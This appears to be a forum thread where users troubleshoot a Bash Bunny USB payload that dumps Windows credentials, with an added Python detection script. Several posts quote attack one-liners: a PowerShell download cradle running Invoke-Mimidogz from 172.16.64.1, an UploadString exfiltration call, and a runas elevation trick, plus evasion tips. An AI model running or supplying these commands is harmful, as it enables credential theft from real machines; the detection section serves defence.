Violation of CoC


illwill


When I run it, it's stalling out at the "WebServer started and Uploading Results" stage. Initially I thought it might be because I run as a full-time VPN client, and that was messing up the routes. But I disabled the VPN, and it's still stalling out. I'll try to step through the attack manually and see where it's breaking down.


So far this just wiped everything in the loot folder. 

 

Tested on Windows 10. 

Going to do some more tests. 

 

Getting this, might be the problem: 

C:\WINDOWS\system32>powershell -c \"while \(\$true\) \{ If \(Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit\"\}\}
At line:1 char:91
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                      ~
Unexpected token '\' in expression or statement.
At line:1 char:92
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                       ~
Unexpected token '}' in expression or statement.
At line:1 char:94
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                         ~
Unexpected token '}' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken
 

Edited by azzarin

So when I try to run this on a laptop with certain policies in place, the CMD command asks for credentials to load, which then causes the whole script to fail after that point, as the command prompt does not get executed. So I think that bypassing UAC in this method is not working, in my situation.

Edited by korang

17 hours ago, illwill said:

You can't copy the code directly and paste it into a cmd prompt because there are backslashes that are escaping special characters....

I just made it pause for longer. I did not copy it. I'll try again. Have you tried on Windows 10?

It might have to do with the language. When it types the line in "cmd" I can see special characters, and it looks the same as I posted before.

Tried on 2 PCs with Windows 10.

 

And thanks for making this.

Edited by azzarin

I was reading through the script and noticed in some instances what korang says happens. I found out in my travels with the Rubber Ducky that not all Windows machines have GUI r set to open Run. Only a particular machine (SHIFT-CTRL-ENTER) does not run something as admin. Have not looked into why.

I just got the BB last week, saw this script and see some improvements that can be made. My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all Windows 7 and up boxes. This is not in any way a diss of what is currently there. I just have ideas to improve it more. Also, I want to do what BunnyTap does and use a Node server instead of Python. I love Python, I use it a lot. Just trying other things.

"Discovery is done through experimentation"..Dr. Whitehall (Marvel)

 

The secret I use for admin is, instead of using cmd by itself, I use PowerShell to run it and get the same prompting result as CTRL-SHIFT-ENTER would:

powershell -c "Start-Process cmd -verb runas"

Now I don't have to worry about those shortcut keys not working.

 

Also, for the Yes button after the prompt, ALT-Y works best for selecting it.

I also found myself building my own agents to fire off a UAC bypass script that will launch my actual script. I did this a few times for fun, but it takes up another 5-10 seconds at the terminal to complete, so it is not practical in a time crunch.

 

Lastly, I see a lot of clear-text scripts in PowerShell. I always reduce and then encode my PowerShell scripts. It helps to avoid having to escape characters, since Base64 is universal. I am going to post some of my tricks from PowerShell Empire, PowerSploit and Rubber Ducky experiences with PowerShell that can be translated to the BB here shortly today.


57 minutes ago, PoSHMagiC0de said:


Looking forward to seeing what you bring to the table.


1 hour ago, azzarin said:


I changed to an English keyboard; it helped a bit, but it does not connect back to the Bash Bunny. Fails to connect.


First of all, thanks for the great payload.

Secondly, unfortunately at first it didn't work, so after putting a pause in the payload I could see why it didn't work.

The PowerShell command creates a typo (I guess it has to do with the keyboard layout); look at the end, where the name of the file comes out as ÉOF instead of 'EOF':

  •  part of the output: ew-Object Net.WebClient).UploadString('http://172.16.64.1/EOF',ÉOF');

So I solved the problem by changing all the file names EOF into DOF. That way the payload creates a file 'DOF' and works great.

Also change the name in the file server.py (EOF to DOF); change it to whatever you like, but avoid the letters E and A, since É also exists.

I would suggest changing it in the original payload, since more people use a US keyboard layout.

Anyway Thanks for the payload and keep up the good work!

 


Good Work, 

I had the same idea because I'm pentesting a company that has forbidden USB storage and Internet access per policy. They have a good firewall with a content filter, and only a few Internet pages are allowed. So you saved me a lot of time coding the stuff... Thank you....

One idea...

.... the whole QUACK stuff takes a lot of time. To save attack time, put a lot of the QUACK code into the PowerShell code. I had done it with your CredDump payload:

https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds

 

Only a suggestion. You do a really good work anyway. 



I haven't tested illwill's payload since he built it. I just saw that he built it and it looked cool from a code point of view. I know he had timing issues in the beginning. Best way is to test. To test, edit his payload.txt and remove the hidden parameter. This will make everything it does visible. See if any red errors go flying across the screen.

You can edit the first line of the ps1 also, for testing only, to see if mimi is even running and sending output. At the bottom is the example of using tee-object to put output in a variable and display it to the console, so you see the output on the Windows machine and still capture it in the "o" variable.

I have not given his payload a go yet directly to see the interaction. I like his Python server and the kill command he sends at the end to close it out rather than leave it running in the background all day.

IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');Invoke-Mimidogz -DumpCred | tee-object -Variable o

 


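A detection-side note added here (this is not code from the thread or from the payload's author): the one-liners quoted in the posts above, the DownloadString cradle feeding Invoke-Mimidogz, the UploadString call to the Bash Bunny address and the Start-Process -verb runas trick, are exactly the strings a defender would look for in PowerShell script block or process-creation logs. The sample command lines below are constructed from those posts; the rule names and the scoring are assumptions of this example, not a product's rule set.

```python
import re

# Constructed sample PowerShell command lines, modelled on the one-liners quoted in
# this thread; they are not real captured logs. In practice these come from Sysmon
# process-creation events or PowerShell script block logging (Event ID 4104).
SAMPLE_CMDLINES = [
    "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');"
    "Invoke-Mimidogz -DumpCred | tee-object -Variable o",
    "powershell -c (New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF','EOF')",
    'powershell -c "Start-Process cmd -verb runas"',
    "powershell -NoProfile -Command Get-Service -Name Spooler",
]

# Each rule is (name, pattern, why it matters). Patterns are case-insensitive because
# PowerShell cmdlet and method names are. Rule names are this example's own.
RULES = [
    ("download_cradle",
     re.compile(r"(IEX|Invoke-Expression)\b.*?Net\.WebClient\)\.DownloadString\(", re.I),
     "script fetched over HTTP and executed in memory"),
    ("webclient_upload",
     re.compile(r"Net\.WebClient\)\.UploadString\(", re.I),
     "HTTP upload from a one-liner, possible exfiltration"),
    ("runas_elevation",
     re.compile(r"Start-Process\b.*?-verb\s+runas\b", re.I),
     "scripted UAC elevation prompt"),
    ("credential_tool",
     re.compile(r"Invoke-Mimi\w*|mimikatz", re.I),
     "known credential-dumping function name"),
]

# Host part of any http(s) URL, so the contacted address can be checked against allow-lists.
URL_HOST = re.compile(r"https?://([\w.\-]+)", re.I)

def scan_cmdline(cmdline):
    """Return the rule names that fire on one command line plus the HTTP hosts it contacts."""
    hits = [name for name, pattern, _ in RULES if pattern.search(cmdline)]
    hosts = sorted(set(URL_HOST.findall(cmdline)))
    return {"rules": hits, "hosts": hosts, "suspicious": bool(hits)}

def scan_all(cmdlines):
    """Scan many command lines and keep only the suspicious ones, with explanations."""
    reasons = {name: why for name, _, why in RULES}
    findings = []
    for cmdline in cmdlines:
        result = scan_cmdline(cmdline)
        if result["suspicious"]:
            result["why"] = [reasons[name] for name in result["rules"]]
            result["cmdline"] = cmdline
            findings.append(result)
    return findings
```

Feeding real script block logs through scan_all gives one finding per suspicious command with the matched rules and the contacted host; an address like 172.16.64.1 that is not a known internal server is the tell for a USB-attached device.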
Info on this module and similar ones.

If you are trying to run Mimi-whatever on a fully updated Windows 10 machine, or even powerdump, good luck. It has been hardened against these. Avast is even able to sniff execution in Win 10, so it will detect mimikatz but not dogz, but dogz will get nothing still. Powerdump will throw an illegal ptr operation. Exploitation frameworks are having the same issue. Windows 7 seems to not have this issue.

 

Avast will detect the exploitation framework too, freeze its operation as it comes up, inform the user of something funny going on and ask if they want to ignore or kill the process. The challenge is now on.

So, on Windows 10 MS is making it tougher to steal creds in memory. Windows 7 shouldn't have any concern. Of course, Win 10 people have to worry about MS spying on them with the Creators Update.


This is one of the best payloads. Even if you can't snag the plain text (Windows 10), you still get the password hashes. If you can't get it working, just add a few more DELAYs.

As I'm in China, I have to add Q SHIFT once it opens the terminal. This is because many systems use a pinyin input method that switches back and forth from English to Chinese by pressing SHIFT. If I don't, the terminal will fill up with Chinese characters.

Great payload dude!


On my updated Win10 Pro machine and image it fails. The injects that some payloads need to do are not allowed anymore, even with PS 2.0 enabled. Update the Win10 machine to the latest updates and you may see the same. If it is Win10 Home, I do not know how it will work.

 

I noticed that with any exploit framework I have, the process injects are failing now on Win10.

 


I tried to mess around with mimikatz on win 10 and it denied me every time no matter what directory I used or even as an admin.



Sorry for a stupid question, but where to put the md.ps1, server.py and p.ps1 to get this to work?

 

Root of the Bash Bunny filesystem or in the USB storage FS?

 

Edit: after looking at the payload .txt, I noticed it's calling it in $switchdir. I got it now.

 

EDIT2: anyone having issues with it waiting for the webserver, even though it's up and hosting p.ps1?

When I manually run it, the BB goes green. Otherwise it just sits flashing blue forever.

Running on Windows7pro base install fully up to date.

 

I'm no PS pro, otherwise I'd debug it myself :/ I'm more of a physical penetration-ist myself. Just dabbled in some coding.

Edited by KenPC
